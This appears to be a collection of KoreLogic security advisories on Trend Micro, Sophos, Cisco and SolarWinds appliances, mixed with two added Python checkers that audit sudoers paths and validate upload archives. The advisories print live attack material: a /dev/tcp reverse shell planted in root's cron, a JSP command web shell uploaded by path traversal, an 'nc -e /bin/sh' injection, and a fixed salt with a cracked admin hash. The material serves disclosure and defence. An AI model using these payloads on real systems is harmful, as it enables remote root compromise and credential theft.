This vulnerability was discovered by Hank Leininger and Matt Bergin (@thatguylevel) of KoreLogic, Inc.

6. Disclosure Timeline

2017.02.16 - KoreLogic sends vulnerability report and PoC to Solarwinds using PGP key with fingerprint A86E 0CF6 9665 0C8C 8A7C C9BA B373 8E9F 951F 918F.
2017.02.20 - Solarwinds replies that the key is no longer in use, requests alternate communication channel.
2017.02.22 - KoreLogic submits vulnerability report and PoC to alternate Solarwinds contact.
2017.02.23 - Solarwinds confirms receipt of vulnerability report.
2017.04.06 - 30 business days have elapsed since Solarwinds acknowledged receipt of vulnerability details.
2017.04.11 - Solarwinds releases hotfix and public disclosure.
2017.04.24 - KoreLogic public disclosure.

7. Proof of Concept

See 3. Technical Description

The contents of this advisory are copyright(c) 2017 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt
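KL-001-2017-005 and KL-001-2017-006 are two faces of one configuration weakness: a NOPASSWD sudo grant whose target the grantee can influence, either because a directory on the path is replaceable (the `mv scripts scripts.real` step above) or because the granted script itself changes ownership of arbitrary files. The audit below is an added example, not SolarWinds code. It walks every component of each command path in a sudoers entry and flags components that are symlinks, not owned by the trusted uid, group/world writable, or missing. The sudoers line and the directory tree it inspects are constructed to mirror the advisory's layout and are built in a temporary directory; the trusted uid is the current user so the demo runs unprivileged (on a real appliance use `trusted_uid=0` and `root="/"`).

```python
"""Audit sudoers NOPASSWD command paths for components the grantee could replace.

Added example, not SolarWinds code. Every component of each granted command
path below `root` is checked; symlinks, components not owned by trusted_uid,
group/world-writable components and missing components are reported. The
sudoers text and directory tree are constructed to mirror the advisory.
"""
import os
import re
import stat
import tempfile

SUDOERS_SAMPLE = (
    "cmc ALL=(ALL) NOPASSWD: /usr/local/contego/scripts/hostname.sh, "
    "/sbin/shutdown, /usr/bin/lem/lynx-admin-ui\n"
)


def parse_sudoers_commands(sudoers_text):
    """Map user -> list of command paths from NOPASSWD entries (one entry per line)."""
    grants = {}
    for line in sudoers_text.splitlines():
        m = re.match(r"^(\S+)\s+\S+=\(\S+\)\s+NOPASSWD:\s*(.+)$", line.strip())
        if not m:
            continue
        user, spec = m.groups()
        # keep only the program path; sudoers may append argument patterns
        paths = [c.strip().split()[0] for c in spec.split(",") if c.strip()]
        grants.setdefault(user, []).extend(paths)
    return grants


def path_findings(command_path, root="/", trusted_uid=0):
    """List (component, problem) for every unsafe component of command_path under root."""
    findings = []
    current = root
    for part in command_path.strip("/").split("/"):
        current = os.path.join(current, part)
        try:
            st = os.lstat(current)
        except FileNotFoundError:
            findings.append((current, "missing"))
            break
        if stat.S_ISLNK(st.st_mode):
            findings.append((current, "symlink"))  # resolves to wherever its owner points it
            continue
        if st.st_uid != trusted_uid:
            findings.append((current, "not owned by trusted uid"))
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append((current, "group/world writable"))
    return findings


def audit(sudoers_text, root="/", trusted_uid=0):
    """Return {command_path: findings} for every granted command with at least one problem."""
    report = {}
    for paths in parse_sudoers_commands(sudoers_text).values():
        for path in paths:
            problems = path_findings(path, root, trusted_uid)
            if problems:
                report[path] = problems
    return report


def build_demo_tree(root):
    """Construct a miniature filesystem that reproduces the advisory's conditions."""
    contego = os.path.join(root, "usr", "local", "contego")
    real_scripts = os.path.join(contego, "scripts.real")
    os.makedirs(real_scripts)
    os.makedirs(os.path.join(root, "sbin"))
    for d in ("usr", "usr/local", "usr/local/contego/scripts.real", "sbin"):
        os.chmod(os.path.join(root, d), 0o755)
    os.chmod(contego, 0o777)  # the lax permission that lets cmc rename 'scripts'
    for f in (os.path.join(real_scripts, "hostname.sh"), os.path.join(root, "sbin", "shutdown")):
        with open(f, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(f, 0o755)
    # the replacement directory from the advisory: scripts -> scripts.real
    os.symlink("scripts.real", os.path.join(contego, "scripts"))


def run_demo():
    """Build the constructed tree in a temp dir and audit the sample sudoers entry."""
    with tempfile.TemporaryDirectory() as root:
        build_demo_tree(root)
        return audit(SUDOERS_SAMPLE, root=root, trusted_uid=os.getuid())


if __name__ == "__main__":
    for path, problems in run_demo().items():
        for component, problem in problems:
            print(f"{path}: {component}: {problem}")
```

In the demo, hostname.sh is reported twice (its parent contego directory is world-writable and the scripts component is a symlink), /sbin/shutdown passes, and lynx-admin-ui is reported as missing. A clean result for every granted path is the condition under which a NOPASSWD grant actually limits what runs as root.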
KL-001-2017-003 : Trendmicro InterScan Remote Root Access Vulnerability
Title: Trendmicro InterScan Remote Root Access Vulnerability
Advisory ID: KL-001-2017-003
Publication Date: 2017.02.15
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-003.txt

1. Vulnerability Details

Affected Vendor: Trendmicro
Affected Product: InterScan Web Security Virtual Appliance
Affected Version: OS Version 3.5.1321.el6.x86_64; Application Version 6.5-SP2_Build_Linux_1548
Platform: Embedded Linux
CWE Classification: CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'), CWE-434: Unrestricted Upload of File with Dangerous Type
Impact: Root Access
Attack vector: HTTP

2. Vulnerability Description

Any authenticated user can overwrite specific files on the local system, which can be exploited to result in root access.

3. Technical Description

An attacker can use a HTTP POST request to instruct the management application to backup the current appliance configuration into a tarball. A valid session is required.

POST /servlet/com.trend.iwss.gui.servlet.ConfigBackup?action=download HTTP/1.1
Host: 1.3.3.7:8443
[snip]

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Disposition: attachment; filename="IWSVA6.5-SP2_Config.tar"
[snip]

Extracting the tar file gives you several files, detailed below:

$ tar xf IWSVA6.5-SP2_Config.tar
x Configurations/
x Configurations/icaps.pkey
x Configurations/ClientConnectionQuotaWhiteList.ini
x Configurations/IWSSPINcieScan.dsc
[snip]
$ cd Configurations/
$ ls -la shadow passwd crontab.iscan crontab.root S55sshd S99lanbypass prd.passwd iscan root
-rwxr-xr-x@ 1 level staff 4683 25 oct 05:32 S55sshd
-rwxr-xr-x@ 1 level staff 13553 25 oct 05:32 S99lanbypass
-rw-r-@ 1 level staff 1738 25 oct 05:32 crontab.iscan
-rw-r-@ 1 level staff 416 25 oct 05:32 crontab.root
-rw-r--r--@ 1 level staff 693 25 oct 05:32 passwd
-rw-r-@ 1 level staff 44 25 oct 05:32 prd.passwd
-- 1 level staff 427 25 oct 05:32 shadow
-rw---@ 1 level staff 1796 25 oct 05:50 iscan
-rw---@ 1 level staff 467 25 oct 05:32 root

The file content presents several attack scenarios:

Obtain hashes for all accounts
Poison shadow file with known hash
Poison cron with a bash shell
Poison scripts executed at boot
Directory traversal with web shell

The file, root, contains cron entries which are run by the root user at boot. A bash reverse shell was appended to this file and a new tar file containing the poisoned file was created.

$ head -n 1 root
0-59/2 * * * * /usr/iwss/bin/systemupdate > /dev/null 2>&1
$ echo */2 * * * * /bin/bash -i >& /dev/tcp/1.3.3.8/8086 0>&1 >> root
$ cd ..; tar cf hacked.tar Configurations/ ProductInfo.xml

POST /servlet/com.trend.iwss.gui.servlet.ConfigBackup?action=import=/usr/iwss/AdminUI/tomcat/import/hacked.tar=1 HTTP/1.1
Host: 1.3.3.7:8443
[snip]

HTTP/1.1 302 Found
Server: Apache-Coyote/1.1
[snip]

This resulted in a netcat shell as the root user.

$ nc -lv 8086
[root@iwsva65sp2 ~]# id;uname -a
uid=0(root) gid=0(root) groups=0(root)
Linux iwsva65sp2 2.6.32-504.OpenVA.3.5.1321.el6.x86_64 #1 SMP Tue Dec 23 15:08:35 CST 2014 x86_64 x86_64 x86_64 GNU/Linux
[root@iwsva65sp2 ~]#

4. Mitigation and Remediation Recommendation

The vendor has issued a patch for this vulnerability in Version 6.5 CP 1737. Security advisory and link to the patched version available at:
https://success.trendmicro.com/solution/1116672

5. Credit

This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc.

6. Disclosure Timeline

2016.12.12 - KoreLogic sends vulnerability report and PoC to Trendmicro.
2016.12.15 - Trendmicro acknowledges receipt of report.
2017.01.11 - Trendmicro informs KoreLogic that the patch to this and other KoreLogic reported issues will likely be available after the 45 business day deadline (2017.02.16).
2017.02.06 - Trendmicro informs KoreLogic that the patched version will be available by 2017.02.14.
2017.02.14 - Trendmicro security advisory released.
2017.02.15 - KoreLogic public disclosure.

7. Proof of Concept

See 3. Technical Description.

The contents of this advisory are copyright(c) 2017 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/
KL-001-2017-001 : Trendmicro InterScan Arbitrary File Write
Title: Trendmicro InterScan Arbitrary File Write
Advisory ID: KL-001-2017-001
Publication Date: 2017.02.15
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-001.txt

1. Vulnerability Details

Affected Vendor: Trendmicro
Affected Product: InterScan Web Security Virtual Appliance
Affected Version: OS Version 3.5.1321.el6.x86_64; Application Version 6.5-SP2_Build_Linux_1548
Platform: Embedded Linux
CWE Classification: CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'), CWE-434: Unrestricted Upload of File with Dangerous Type
Impact: Remote Code Execution
Attack vector: HTTP

2. Vulnerability Description

An authenticated user can create files on the local system. This can lead to remote command execution as an authenticated user.

3. Technical Description

A servlet takes an arbitrary file path as an output filename, and the webserver can create files in the webroot. So, a malicious .jsp can be uploaded and then executed through a subsequent request to the webserver. Shell courtesy of the fuzzdb-project (https://github.com/fuzzdb-project/fuzzdb/blob/master/web-backdoors/jsp/cmd.jsp).

POST /servlet/com.trend.iwss.gui.servlet.ConfigBackup?action=upload_check HTTP/1.1
Host: 1.3.3.7:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://1.3.3.7:8443/config_backup_collapsed.jsp
Cookie: JSESSIONID=E600D5296A2282C4C7AD46BCDAADEB47
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---135470425518767155135967265
Content-Length: 1486

-135470425518767155135967265
Content-Disposition: form-data; name="CSRFGuardToken"

4POCBRSFC1TYEO2D5IHNLLJAX27BNBLF
-135470425518767155135967265
Content-Disposition: form-data; name="op"

save
-135470425518767155135967265
Content-Disposition: form-data; name="uploadfile"; filename="../../../../usr/iwss/AdminUI/tomcat/webapps/ROOT/korelogic.jsp"

<%@ page import="java.util.*,java.io.*"%>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
-135470425518767155135967265
Content-Disposition: form-data; name="beFullyOrPartially"

0
-135470425518767155135967265--

HTTP/1.1 302 Found
Server: Apache-Coyote/1.1
Location: https://1.3.3.7:8443/config_backup_collapsed.jsp?CSRFGuardToken=4POCBRSFC1TYEO2D5IHNLLJAX27BNBLF=6
Content-Length: 0
Date: Tue, 25 Oct 2016 14:36:07 GMT
Connection: close

GET /korelogic.jsp?CSRFGuardToken=4POCBRSFC1TYEO2D5IHNLLJAX27BNBLF=id HTTP/1.1
Host: 1.3.3.7:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://1.3.3.7:8443/korelogic.jsp
Cookie: JSESSIONID=E600D5296A2282C4C7AD46BCDAADEB47
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html
Content-Length: 320
Date: Tue, 25 Oct 2016 14:37:58 GMT
Connection: close

Command: id
uid=498(iscan) gid=499(iscan) groups=499(iscan)

4. Mitigation and Remediation Recommendation

The vendor has issued a patch for this vulnerability in Version 6.5 CP 1737. Security advisory and link to the patched version available at:
https://success.trendmicro.com/solution/1116672

5. Credit

This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc.

6. Disclosure Timeline

2016.12.12 - KoreLogic sends vulnerability report and PoC to
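Both InterScan advisories (KL-001-2017-001 and KL-001-2017-003) come down to an import path that trusts client-supplied names: a multipart `filename` containing `../` that is written into the webroot, and a configuration archive whose `Configurations/root` member replaces root's cron entries. The validation below is an added example, not Trend Micro code. It confines an upload to the import directory by basename and extension, and rejects archive members that traverse, are absolute, are links, or are not on an explicit allowlist of restorable files. The allowlist, the import directory and the in-memory sample archive are constructed; the member names echo the advisory's listing.

```python
"""Validate an uploaded configuration archive before anything is written or restored.

Added example, not Trend Micro code. safe_upload_path() confines the upload
to <upload_root>/<basename> with an allowed extension; check_archive() lists
every member that must not be restored. The allowlist and sample archive are
constructed.
"""
import io
import os
import posixpath
import tarfile


class UnsafeArchive(Exception):
    """Raised when an upload name fails validation."""


# Files the importer may overwrite (constructed; names taken from the advisory's listing).
RESTORE_ALLOWLIST = {
    "Configurations/ClientConnectionQuotaWhiteList.ini",
    "Configurations/IWSSPINcieScan.dsc",
}
ALLOWED_SUFFIXES = (".tar",)


def safe_upload_path(upload_root, client_filename):
    """Return the only path an upload may land on: <upload_root>/<basename>."""
    name = os.path.basename(client_filename.replace("\\", "/"))
    if not name or name in (".", "..") or not name.lower().endswith(ALLOWED_SUFFIXES):
        raise UnsafeArchive(f"rejected upload name {client_filename!r}")
    root = os.path.realpath(upload_root)
    target = os.path.realpath(os.path.join(root, name))
    if os.path.dirname(target) != root:
        raise UnsafeArchive("upload would leave the import directory")
    return target


def upload_rejected(upload_root, client_filename):
    """Boolean wrapper around safe_upload_path."""
    try:
        safe_upload_path(upload_root, client_filename)
        return False
    except UnsafeArchive:
        return True


def member_problem(member, allowed):
    """Reason a tar member must not be restored, or None if it may be."""
    name = posixpath.normpath(member.name)
    if member.name.startswith("/") or name == ".." or name.startswith("../"):
        return "path traversal"
    if member.issym() or member.islnk():
        return "link member"
    if not (member.isfile() or member.isdir()):
        return "special file"
    if member.isfile() and name not in allowed:
        return "not in restore allowlist"
    return None


def check_archive(tar_bytes, allowed=RESTORE_ALLOWLIST):
    """List (member name, problem) for every member that fails validation."""
    rejected = []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:*") as tar:
        for member in tar.getmembers():
            problem = member_problem(member, allowed)
            if problem:
                rejected.append((member.name, problem))
    return rejected


def build_sample_archive():
    """Constructed archive: one allowed file, root's cron file, and a traversal member."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, data in (
            ("Configurations/IWSSPINcieScan.dsc", b"sample\n"),
            ("Configurations/root", b"*/2 * * * * /bin/true\n"),
            ("../../../../usr/iwss/AdminUI/tomcat/webapps/ROOT/korelogic.jsp", b"x\n"),
        ):
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


if __name__ == "__main__":
    for name, problem in check_archive(build_sample_archive()):
        print(f"reject {name}: {problem}")
    print(safe_upload_path("/srv/iwss-import", "IWSVA6.5-SP2_Config.tar"))
```

An archive with any rejected member should be refused as a whole rather than partially restored, and the allowlist is the control that matters for the root-access case: a backup format that can carry `root`, `shadow` or boot scripts must not be allowed to write them back.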
KL-001-2016-009 : Sophos Web Appliance Remote Code Execution
Title: Sophos Web Appliance Remote Code Execution
Advisory ID: KL-001-2016-009
Publication Date: 2016.11.03
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-009.txt

1. Vulnerability Details

Affected Vendor: Sophos
Affected Product: Web Appliance
Affected Version: v4.2.1.3
Platform: Embedded Linux
CWE Classification: CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'), CWE-88: Argument Injection or Modification
Impact: Remote Code Execution
Attack vector: HTTP

2. Vulnerability Description

An authenticated user of any privilege can execute arbitrary system commands as the non-root webserver user.

3. Technical Description

Multiple parameters to the web interface are unsafely handled and can be used to run operating system commands, such as:

POST /index.php?c=logs HTTP/1.1
Host: [redacted]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.6.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 305
Connection: close

STYLE=590fca17b230e8cdba0394cfa28ef2eb=today=_xperiod=xdays=_time_start=12%3A00%20AM=_time_end=11%3A59%20PM_filter_user_timeline=test=search=user_timeline`nc%20-e%20/bin/sh%20[redacted]%209191`=test=time=1===1

HTTP/1.1 200 OK
Date: Tue, 10 May 2016 15:35:05 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, private, post-check=0, pre-check=0
Pragma: no-cache
X-Frame-Options: sameorigin
X-Content-Type-Options: nosniff
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 207

{"lastPage":1,"startTime":"2016\/05\/10 12:00 AM","endTime":"2016\/05\/10 4:35 PM","filter":"test","recordsDisplayed":0,"recordsTotal":0,"data":[],"startDateBeforeData":false,"earliestRecord":"1970\/01\/01"}

--

The vulnerable parameters are: by, request_id, and txt_filter_domain

That request launches the following process on the SWA:

1000 16851 0.0 0.0 2728 1040 ? S 15:43 0:00 sh -c /opt/perl/bin/salp-generate-report.pl --report=Filter --res=- --type=user_timeline`nc -e /bin/sh [redacted] 9191` --filter='dGVzdA==' --start='2016/05/10' --end='2016/05/10' --action='' --sid=590fca17b230e8cdba0394cfa28ef2eb

From the shell launched via netcat:

id;uname -a;uptime
uid=1000(spiderman) gid=1000(spiderman) groups=1000(spiderman),16(cron),44(tproxyd),45(wdx)
Linux please 3.2.57 #1 SMP Fri Feb 19 18:30:36 UTC 2016 i686 GNU/Linux
 15:52:34 up 4:26, 0 users, load average: 0.11, 0.12, 0.15

4. Mitigation and Remediation Recommendation

The vendor has issued a fix for this vulnerability in Version 4.3 of SWA.
Release notes available at:
http://swa.sophos.com/rn/swa/concepts/ReleaseNotes_4.3.html

5. Credit

This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc.

6. Disclosure Timeline

2016.09.09 - KoreLogic sends vulnerability report and PoC to Sophos.
2016.09.14 - Sophos requests KoreLogic re-send vulnerability details.
2016.09.28 - KoreLogic requests status update.
2016.09.28 - Sophos informs KoreLogic that an update including a fix for this vulnerability will be available near the end of October.
2016.10.13 - Sophos informs KoreLogic that the update was released to a limited customer base and is expected to be distributed at-large over the following week.
2016.11.03 - Public disclosure.

7. Proof of Concept

See 3. Technical Description.

The contents of this advisory are copyright(c) 2016 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt
KL-001-2016-008 : Sophos Web Appliance Privilege Escalation
Title: Sophos Web Appliance Privilege Escalation
Advisory ID: KL-001-2016-008
Publication Date: 2016.11.03
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-008.txt

1. Vulnerability Details

Affected Vendor: Sophos
Affected Product: Web Appliance
Affected Version: v4.2.1.3
Platform: Embedded Linux
CWE Classification: CWE-522: Insufficiently Protected Credentials, CWE-261: Weak Cryptography for Passwords
Impact: Privilege Escalation
Attack vector: HTTP

2. Vulnerability Description

An unprivileged user can obtain an MD5 hash of the administrator password, which can then be used to discover the plain-text password.

3. Technical Description

A user with the privileges Helpdesk, Policy, Reporting, or User Activity can obtain an MD5 hash for the Full Access Administrator account. A valid session identifier is required and is delivered through the STYLE parameter.

GET /index.php?c=change_password=7151e50b0389755717510f218b1af00c HTTP/1.1
Host: [redacted]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close

HTTP/1.1 200 OK
Date: Tue, 10 May 2016 00:36:43 GMT
Server: Apache
X-UA-Compatible: IE=7
Cache-Control: no-store, no-cache, must-revalidate, private, post-check=0, pre-check=0
Pragma: no-cache
X-Frame-Options: sameorigin
X-Content-Type-Options: nosniff
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 8798

...
{"currentUser":"test","globalUser":false,"swa_title":"Change Password","usersJS":"[{\"id\":\"default_admin\",\"username\":\"admin\",\"name\":\"Default Administrator\",\"password\":\"f98d0973dffdc3a29ee67167c15b882e\",\"description\":\"Default Administrator Account\",\"admin\":true,\"roles\":\"Full Access Administrator\",\"reporting_groups\":[]},{\"id\":\"5605c1fef6927d2c45a62b0abcba5385\",\"username\":\"test\",\"name\":\"test\",\"password\":\"caeaea5602b40c779b8669b7001f3396\",\"description\":\"asdfghj\",\"admin\":false,\"roles\":[\"helpdesk\",\"policy\",\"reporting\",\"user_activity\"],\"reporting_groups\":[\"all\"]},{\"id\":\"a39244da844197796609fc5b8aad7f3c\",\"username\":\"woot\",\"name\":\"woot\",\"password\":\"f0ce19faed6df0443c80aceea4c7b7ae\",\"description\":\"none\",\"admin\":false,\"roles\":[\"helpdesk\"],\"reporting_groups\":[]}]","cma":{"joined":false,"host":"","is_cma":false,"swa_joined":false,"is_vm":true},"locale":"en","trialMode":true,"licenseDaysLeft":29,"navigation":["\nCancel<\/span>\n<\/a>","\nSave<\/span>\n<\/a>"],"navigation_left":[],"status_processing":"Submitting...","status_password_dont_match":"Password mismatch","status_invalid_password":"Invalid password","status_current_password_invalid":"Current password invalid","uiStatusMessages":{"status_processing":"Submitting...","status_password_dont_match":"Password mismatch","status_invalid_password":"Invalid password","status_current_password_invalid":"Current password invalid"},"rba":{"reports":true,"search":true,"configuration":true,"system_status":false,"help_support":true,"editable":true,"current_user":"test","globalUser":false,"admin_role":false}
...

A fixed salt is apparently used for all such devices: P3T3R p@rk3r

The admin MD5 hash in this case is: f98d0973dffdc3a29ee67167c15b882e

4. Mitigation and Remediation Recommendation

The vendor has issued a fix for this vulnerability in Version 4.3 of SWA.
Release notes available at:
http://swa.sophos.com/rn/swa/concepts/ReleaseNotes_4.3.html

5. Credit

This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc.

6. Disclosure Timeline

2016.09.09 - KoreLogic sends vulnerability report and PoC to Sophos.
2016.09.14 - Sophos requests KoreLogic re-send vulnerability details.
2016.09.28 - KoreLogic requests status update.
2016.09.28 - Sophos informs KoreLogic that an update including a fix for this vulnerability will be available near the end of October.
2016.10.13 - Sophos informs KoreLogic that the update was released to a limited customer base and is expected to be distributed at-large over the following week.
2016.11.03 - Public disclosure.

7. Proof of Concept

>>> from hashlib import md5
>>> md5('P3T3R p@rk3radmin123').hexdigest()
'f98d0973dffdc3a29ee67167c15b882e'

The contents of this advisory are copyright(c) 2016 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/
KL-001-2016-005 : Cisco Firepower Threat Management Console Hard-coded MySQL Credentials
Title: Cisco Firepower Threat Management Console Hard-coded MySQL Credentials
Advisory ID: KL-001-2016-005
Publication Date: 2016.10.05
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-005.txt

1. Vulnerability Details

Affected Vendor: Cisco
Affected Product: Firepower Threat Management Console
Affected Version: Cisco Fire Linux OS 6.0.1 (build 37/build 1213)
Platform: Embedded Linux
CWE Classification: CWE-798: Use of Hard-coded Credentials
Impact: Authentication Bypass
CVE-ID: CVE-2016-6434

2. Vulnerability Description

The root account for the local MySQL database has poor password complexity.

3. Technical Description

root@firepower:/Volume/6.0.1# mysql -u root --password=admin
Warning: Using a password on the command line interface can be insecure.
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 23348
Server version: 5.6.24-enterprise-commercial-advanced-log MySQL Enterprise Server - Advanced Edition (Commercial)

Copyright (c) 2000, 2015, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| Sourcefire         |
| external_data      |
| external_schema    |
| mysql              |
| performance_schema |
| sfsnort            |
+--------------------+
7 rows in set (0.00 sec)

mysql>

Note that mysqld listens only on loopback, so a remote attacker would have to leverage some other condition to be able to reach the mysql daemon.

4. Mitigation and Remediation Recommendation

The vendor has acknowledged this vulnerability but has not released a fix for the issue. Vendor acknowledgement available at:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161005-ftmc1

5. Credit

This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc.

6. Disclosure Timeline

2016.06.30 - KoreLogic sends vulnerability report and PoC to Cisco.
2016.06.30 - Cisco acknowledges receipt of vulnerability report.
2016.07.20 - KoreLogic and Cisco discuss remediation timeline for this vulnerability and for 3 others reported in the same product.
2016.08.12 - 30 business days have elapsed since the vulnerability was reported to Cisco.
2016.09.02 - 45 business days have elapsed since the vulnerability was reported to Cisco.
2016.09.09 - KoreLogic asks for an update on the status of the remediation efforts.
2016.09.15 - Cisco confirms remediation is underway and soon to be completed.
2016.09.28 - Cisco informs KoreLogic that the acknowledgement details will be released publicly on 2016.10.05.
2016.10.05 - Public disclosure.

7. Proof of Concept

See Technical Description

The contents of this advisory are copyright(c) 2016 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/
KL-001-2016-004 : Cisco Firepower Threat Management Console Authenticated Denial of Service
Title: Cisco Firepower Threat Management Console Authenticated Denial of Service
Advisory ID: KL-001-2016-004
Publication Date: 2016.10.05
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-004.txt

1. Vulnerability Details

Affected Vendor: Cisco
Affected Product: Firepower Threat Management Console
Affected Version: Cisco Fire Linux OS 6.0.1 (build 37/build 1213)
Platform: Embedded Linux
CWE Classification: CWE-404: Improper Resource Shutdown or Release
Impact: Denial of Service
Attack vector: HTTP

2. Vulnerability Description

An authenticated user can send an HTTP request that will crash the Mojo Server, thereby making future access impossible until a system reboot is performed.

3. Technical Description

The parameter uuid is passed to a chmod function as part of a file path. A ';' in the path causes the function to return an exception.

POST /pjb.cgi HTTP/1.1
Host: 1.3.3.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Content-Type: application/x-www-form-urlencoded
Referer: https://1.3.3.7/ddd/
Content-Length: 1180
Cookie: x-auto-507=%7B%22state%22%3A%7B%22offset%22%3A%22i%3A0%22%2C%20%22limit%22%3A%22i%3A20%22%7D%7D; x-auto-467=%7B%22state%22%3A%7B%22offset%22%3A%22i%3A0%22%2C%20%22limit%22%3A%22i%3A20%22%7D%7D; CGISESSID=ab588faec87c38a18347787e3b442ff8
Connection: close

=SF::UI::PJB::Vpn::List::saveVpnDeployment=%5B%7B%22password%22%3A%22test%22%2C+%22authentication_method%22%3A%22password%22%2C+%22type%22%3A%22PTP%22%2C+%22advanced_setting%22%3A%7B%22ah%22%3A0%2C+%22life_bytes%22%3A%220%22%2C+%22life_time%22%3A1%2C+%22life_time_unit%22%3A%22hours%22%2C+%22life_packets%22%3A%220%22%2C+%22ike_life_time%22%3A3%2C+%22ike_life_time_unit%22%3A%22hours%22%2C+%22ikev2%22%3A1%2C+%22ike_algorithm%22%3A%7B%22other_message_allowed%22%3A0%2C+%22auth_messages%22%3A%5B%7B%22cipher%22%3A%22aes128%22%2C+%22hash%22%3A%22sha1%22%2C+%22dh%22%3A%22modp2048%22%7D%2C%7B%22cipher%22%3A%22aes256%22%2C+%22hash%22%3A%22sha256%22%2C+%22dh%22%3A%22modp2048%22%7D%5D%7D%2C+%22phase2_algorithm%22%3A%7B%22other_message_allowed%22%3A0%2C+%22auth_messages%22%3A%5B%7B%22cipher%22%3A%22aes128%22%2C+%22hash%22%3A%22sha1%22%2C+%22dh%22%3A%22%22%7D%2C%7B%22cipher%22%3A%22aes256%22%2C+%22hash%22%3A%22sha256%22%2C+%22dh%22%3A%22%22%7D%5D%7D%7D%2C+%22status%22%3A0%2C+%22name%22%3A%22test%22%2C+%22uuid%22%3A%2207a0d152-09fc-11e6-93cc-9d074250060f;%22%2C+%22applied%22%3A-1%7D%2C%5B%5D%5D_action_id=a5ba3e29eb18730f7c8dc88d53b48759=1=AllVpnList

As no exception handler is defined, the process exits.

